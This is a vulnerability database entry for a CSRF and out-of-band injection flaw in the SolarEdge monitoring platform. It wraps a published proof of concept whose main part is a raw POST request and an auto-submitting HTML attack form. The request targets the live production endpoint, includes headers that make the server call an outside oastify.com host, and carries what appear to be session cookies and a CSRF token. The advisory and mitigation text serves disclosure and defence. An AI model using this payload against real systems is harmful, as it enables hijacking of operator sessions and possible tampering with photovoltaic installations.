solaredge - (CSRF-OOB-Injection)
This entry describes a medium-severity Cross-Site Request Forgery (CSRF) vulnerability with Out-Of-Band (OOB) injection characteristics affecting SolarEdge. The exploit involves leveraging CSRF to perform unauthorized actions potentially involving OOB data injection. No specific affected versions or detailed technical impact are provided. Exploit code is available in text format. No patch or vendor advisory information is provided, and no known exploits in the wild have been reported.
AI Analysis
Technical Summary
The reported vulnerability is a CSRF-OOB injection exploit targeting SolarEdge products or services. CSRF vulnerabilities allow attackers to induce users to execute unwanted actions on a web application in which they are authenticated. The OOB injection aspect suggests that the exploit may involve sending data or triggering actions that occur outside the normal request-response cycle, but no further technical details are given. There is no information on affected versions or vendor remediation.
Potential Impact
The impact is rated medium severity based on the provided data. Without detailed technical or vendor information, the precise consequences are unclear, but CSRF vulnerabilities typically allow unauthorized actions under the context of an authenticated user, potentially leading to unauthorized configuration changes or data manipulation.
Mitigation Recommendations
Patch status is not yet confirmed; check the vendor advisory for current remediation guidance. No official fix or mitigation instructions are provided. Until a vendor advisory is available, users should consider standard CSRF mitigations such as validating anti-CSRF tokens on every state-changing request and restricting actions to POST requests where applicable, but these are general recommendations and may not fully address this specific issue; in particular, the proof of concept below already submits an auto-posting HTML form, so a POST-only restriction on its own does not block it.
Indicators of Compromise
Exploit Source Code

# Titles: solaredge - (CSRF-OOB-Injection)
# Author: nu11secur1tyAI
# Date: 2026-04-26
# Vendor: SolarEdge Technologies Ltd.
# Software: SolarEdge Monitoring Platform - Framework /solaredge-web/
# Reference: https://monitoring.solaredge.com/

## Description:
The solaredge-CSRF-Hijack vulnerability arises due to a critical business logic flaw in the `/solaredge-web/p/initClient` endpoint. The system allows the generation and overwriting of session parameters (`createCookie`) via POST requests that are not properly validated against their origin. An attacker can exploit this flaw to force a legitimate operator's browser to execute unauthorized commands without their knowledge.

Additionally, an Out-of-Band (OOB) injection vulnerability was discovered via the `X-Forwarded-For` and `Referer` headers. By manipulating these headers, an attacker forces the SolarEdge internal infrastructure to initiate requests to external, attacker-controlled domains (e.g., oastify.com or a custom malicious site). This demonstrates a lack of framework-level filtration, leading to session compromise and potential unauthorized control over physical photovoltaic systems.

STATUS: MEDIUM - HIGH / Vulnerability

[+] Payload:
```
POST /solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue HTTP/2
Host: monitoring.solaredge.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="146", "Not;A=Brand";v="24", "Google Chrome";v="146"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
X-Forwarded-For: cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=6F1B6162792D05EFCE515BF203A1921E9D85FA41057990C6C526B90DAEB5D65BFE52B0034F4F2D5B10424FFE2CBA711A654936F114998927041CA486611931EE3C0F205C04CA429EC894DF7A64DE9DB5108F3140B957001C751D7A57EF756DDD7971301F05C962751C9CA2F4D39478356BDF1D2ABEF343E3B0C8D5D9FF19A8F2; cf_clearance=DtyVi9hHPwvwTxW7i3XtdkHyMQmr.8bxpKOx7YOux2k-1777189382-1.2.1.1-Oe0DEHsLmJqAbUfnWsvheB8svxkc8b6u25VOWn6Q5.47kl..hy7lFUAWAFjjxFt3iVZDZvc.3dByQVMD7OKuyNedVj14sw4mf3ixhjjUzo.u8AbMMvMzr3dTFA.4ZMxREUB6w_km08hdN2Q9dqPdyl6a3Yo2ClDEosIsGuHs5gZkTMybd50CzjFB8UhCMfJDkUND4ZgT7yhn9nuwGnRpOdiW9xeQyMCzd52WXjDuGnrAADkNCbkOM.6VcWypMaA.f2gz2TVRI9gXPqpGBlnxTiwQB25NHZe_oxGVldzLBNdG0M42RlULw5G7DAcF_r1wh.UGpZYS8D4007p9.A_OAQ; __cf_bm=PxF5ZT6Bu4Jvd86dcTD_ayOFIDAo62QeOUj7C0QEn_s-1777189382.1867328-1.0.1.1-8S0957YKxPKpytYZZF4ullyTfKTwS8YpjtVRZlwNMROgEmHBO4fsAHVXdp6MPfQTg3igFXX.Ec4FXoaC5N3gaRAqF8uuepOG1x26_eex8fjMXRd9Mldj1PH43.f.p2Yb; CSRF-TOKEN=38962BC08EC10395F7DE6C11BC3794A98C5AF2B9B56066AC1830F7780E4C8394BA3D0CA2E2D5148E0BB52B778A7C8A11FD90
Origin: https://monitoring.solaredge.com
Referer: http://cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com/vulnerabilities/
Content-Length: 0
```

[+] Exploit:
```html
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="https://monitoring.solaredge.com/solaredge-web/p/initClient?cmd=createCookie&target=login&client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue" method="POST">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

# Demo: [href](https://www.patreon.com/posts/solaredge-csrf-156577436)
# Time spent: 01:25:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>
Technical Details
- EDB-ID: 52569
- Has exploit code: true
- Code language: text
Threat ID: 6a0f29ffe1370fbb48ed2e99
Added to database: 5/21/2026, 3:51:27 PM
Last enriched: 5/21/2026, 3:52:07 PM
Last updated: 5/21/2026, 5:13:33 PM